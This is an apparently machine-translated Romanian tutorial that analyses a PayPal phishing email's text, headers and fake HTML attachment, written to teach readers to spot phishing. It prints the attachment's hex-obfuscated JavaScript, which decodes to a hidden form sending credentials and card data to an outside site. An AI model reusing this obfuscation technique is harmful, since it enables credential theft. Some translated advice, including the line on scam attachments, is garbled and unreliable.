Pagina principala » HOWTO » Securitatea online ruperea anatomiei unui e-mail de phishing

    Securitatea online ruperea anatomiei unui e-mail de phishing


    În lumea de astăzi, unde informația fiecăruia este online, phishingul este unul dintre cele mai populare și mai devastatoare atacuri online, pentru că puteți curăța întotdeauna un virus, dar dacă detaliile dvs. bancare sunt furate, aveți probleme. Iată o defalcare a unui astfel de atac pe care l-am primit.

    Nu credeți că sunt doar detaliile dvs. bancare importante: la urma urmei, dacă cineva dobândește controlul asupra contului dvs. de conectare la cont, acesta nu numai că cunoaște informațiile conținute în acel cont, ci șansele sunt că aceleași informații de conectare pot fi utilizate pe diferite alte conturi. Și dacă vă compromite contul de e-mail, aceștia vă pot reseta toate celelalte parole.

    Deci, în plus față de păstrarea parolelor puternice și variate, trebuie să fiți mereu în căutarea unor emailuri false care se comportă ca un lucru real. În timp ce cele mai multe încercări de phishing sunt amateuriste, unele sunt destul de convingătoare, așa că este important să înțelegem cum să le recunoaștem la nivel de suprafață, precum și cum funcționează sub capota.

    Imagine de asirap

    Examinați ceea ce este în viziunea simplă

    Exemplul nostru de e-mail, la fel ca cele mai multe încercări de phishing, "vă anunță" despre activitatea dvs. din contul dvs. PayPal, care, în condiții normale, ar fi alarmantă. Deci, apelul la acțiune este să verifici / să-ți restabilești contul prin trimiterea exactă a fiecărei informații personale pe care o poți gândi. Din nou, acest lucru este destul de formic.

    Deși există cu siguranță excepții, aproape toate e-mailurile de phishing și înșelătorie sunt încărcate cu steaguri roșii direct în mesaj. Chiar dacă textul este convingător, puteți găsi, de obicei, multe greșeli îngrădite în tot corpul mesajului, care indică faptul că mesajul nu este legitim.

    Corpul mesajelor

    La prima vedere, acesta este unul dintre cele mai bune e-mailuri de phishing pe care le-am văzut. Nu există greșeli de ortografie sau gramatică, iar verbiage citește în funcție de ceea ce vă puteți aștepta. Cu toate acestea, există câteva steaguri roșii pe care le puteți vedea atunci când examinați conținutul puțin mai îndeaproape.

    • "Paypal" - Cazul corect este "PayPal" (capital P). Puteți observa că ambele variante sunt utilizate în mesaj. Companiile sunt foarte deliberate cu branding-ul lor, deci este îndoielnic că așa ceva ar trece procesul de verificare.
    • "Permiteți ActiveX" - De câte ori ați văzut o afacere legitimă bazată pe web dimensiunea Paypal utilizează o componentă de proprietate care funcționează numai pe un singur browser, mai ales atunci când suportă mai multe browsere? Sigur, undeva acolo o face o companie, dar acesta este un steag roșu.
    • "Sigur". - Observați cum acest cuvânt nu se aliniază marginii cu restul textului paragrafului. Chiar dacă aș întinde fereastra un pic mai mult, nu se înfășoară sau spațiul corect.
    • "Paypal!" - Spațiul din fața semnului de exclamare pare ciudat. Doar un alt aspect care sunt sigur că nu ar fi într-un e-mail legit.
    • "PayPal - Formularul de actualizare a contului.pdf.htm" - De ce ar fi atașat Paypal un "PDF" mai ales când ar putea să se lege doar la o pagină de pe site-ul lor? În plus, de ce ar încerca să ascundă un fișier HTML ca un PDF? Acesta este cel mai mare steag roșu al tuturor.

    Antetul mesajului

    Când aruncați o privire la antetul mesajului, vor apărea câteva mai multe steaguri roșii:

    • Adresa de la adresa este [email protected].
    • Adresa lipsă. Nu am renunțat la asta, pur și simplu nu face parte din antetul mesajului standard. De obicei, o companie cu numele dvs. vă va personaliza e-mailul.

    Atașamentul

    Când deschid atașamentul, puteți vedea imediat că aspectul nu este corect deoarece lipsesc informațiile de stil. Din nou, de ce ar fi trimis PayPal un formular HTML atunci când acestea ar putea pur și simplu să vă dea un link pe site-ul lor?

    Notă: am folosit vizualizatorul de atașamente HTML din Gmail încorporat pentru acest lucru, dar vă recomandăm să nu dezactivați atașamentele de la escrocii. Nu. Vreodată. Acestea conțin foarte multe exploitări care vor instala troieni pe PC-ul dvs. pentru a vă fura informații despre cont.

    Derulându-vă puțin mai mult, puteți observa că acest formular solicită nu numai informațiile noastre de conectare PayPal, ci și informațiile bancare și cărțile de credit. Unele imagini sunt rupte.

    Este evident că această încercare de phishing se întâmplă după totul cu o singură lovitură.

    Defalcarea tehnică

    Deși ar trebui să fie destul de clar pe baza a ceea ce este clar că aceasta este o încercare de phishing, acum vom descompune machiajul tehnic al e-mailului și vom vedea ce putem găsi.

    Informații din atașament

    Primul lucru pe care ar trebui să-l aruncăm o privire este sursa HTML a formularului de atașament care este ceea ce transmite datele către site-ul fals.

    Atunci când vizualizați rapid sursa, toate link-urile apar valide pe măsură ce indică fie "paypal.com", fie "paypalobjects.com" care sunt ambele legit.

    Acum vom arunca o privire la unele informații de bază pe care Firefox le adună pe pagină.

    După cum puteți vedea, unele grafică sunt extrase din domeniile "blessedtobe.com", "goodhealthpharmacy.com" și "pic-upload.de" în locul domeniilor legale PayPal.

    Informații din anteturile de e-mail

    Apoi vom arunca o privire la anteturile de e-mail brute. Gmail face acest lucru disponibil prin opțiunea de meniu Afișare originală din mesaj.

    Privind informațiile de antet pentru mesajul original, puteți vedea că acest mesaj a fost compus folosind Outlook Express 6. Mă îndoiesc că PayPal are pe cineva din personal care trimite fiecare dintre aceste mesaje manual printr-un client de e-mail învechit.

    Acum, uitandu-ne la informatiile de rutare, putem vedea adresa IP a serverului de expeditor si a serverului de mail.

    Adresa IP "Utilizator" este expeditor original. Făcând o căutare rapidă a informațiilor despre IP, putem vedea că IP-ul de expediere se află în Germania.

    Și când ne uităm la adresa de e-mail a serverului de retransmitere (mail.itak.at), putem vedea că acesta este un ISP cu sediul în Austria. Mă îndoiesc că PayPal își redirecționează e-mailurile direct prin intermediul unui furnizor ISP din Austria, atunci când are o fermă de servere masivă care ar putea gestiona cu ușurință această sarcină.

    Unde merge datele??

    Așadar, am stabilit în mod clar că acesta este un e-mail de phishing și a adunat câteva informații despre locul unde a provenit mesajul, dar despre cum se trimite datele dvs.?

    Pentru a vedea acest lucru, trebuie mai întâi să salvăm atașamentul HTM pe desktopul nostru și să îl deschidem într-un editor de text. Trecând prin ea, totul pare a fi în ordine, cu excepția cazului în care ajungem la un blocaj Javascript cu aspect suspect.

    Descoperind întreaga sursă a ultimului bloc de Javascript, vedem:


    // Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
    var i, y, x =“3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e“ y =“pentru (i = 0; i

    Ori de câte ori vedeți un șir mare de litere aparent aleatoare și numere încorporate într-un bloc Javascript, este de obicei ceva suspect. Privind codul, variabila "x" este setată la acest șir mare și apoi decodificată în variabila "y". Rezultatul final al variabilei "y" este apoi scris în document ca HTML.

    Deoarece șirul mare este format din cifrele 0-9 și literele a-f, este cel mai probabil codificat printr-o conversie ASCII la Hex simplă:

    3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

    Translati la:

    Nu este o coincidență faptul că acest lucru se decodifică într-o etichetă validă a formularului HTML care trimite rezultatele nu către PayPal, ci către un site necinstit.

    În plus, când vizualizați sursa HTML a formularului, veți vedea că această etichetă de formular nu este vizibilă deoarece este generată în mod dinamic prin Javascript. Acesta este un mod inteligent de a ascunde ceea ce face HTML, dacă cineva ar vedea pur și simplu sursa generată de atașament (așa cum am făcut mai devreme), spre deosebire de deschiderea atașamentului direct într-un editor de text.

    Făcând un sweeper rapid pe site-ul ofensator, putem vedea că acesta este un domeniu găzduit de o gazdă web populară, 1and1.

    Ceea ce se remarcă este că domeniul utilizează un nume lizibil (spre deosebire de ceva de genul "dfh3sjhskjhw.net"), iar domeniul a fost înregistrat timp de 4 ani. Din acest motiv, cred că acest domeniu a fost deturnat și folosit ca pion în această încercare de phishing.

    Cynicismul este o apărare bună

    Când vine vorba de a rămâne în siguranță online, nu doare niciodată să aibă un bun cinism.

    Deși sunt sigur că există mai multe steaguri roșii în exemplul de e-mail, ceea ce am subliniat mai sus sunt indicatorii pe care i-am văzut după doar câteva minute de examinare. Din punct de vedere ipotetic, dacă nivelul de suprafață al e-mailului și-a imitat 100% omologul legitim, analiza tehnică ar dezvălui totuși adevărata sa natură. De aceea este importat să puteți examina atât ce puteți și ce nu puteți vedea.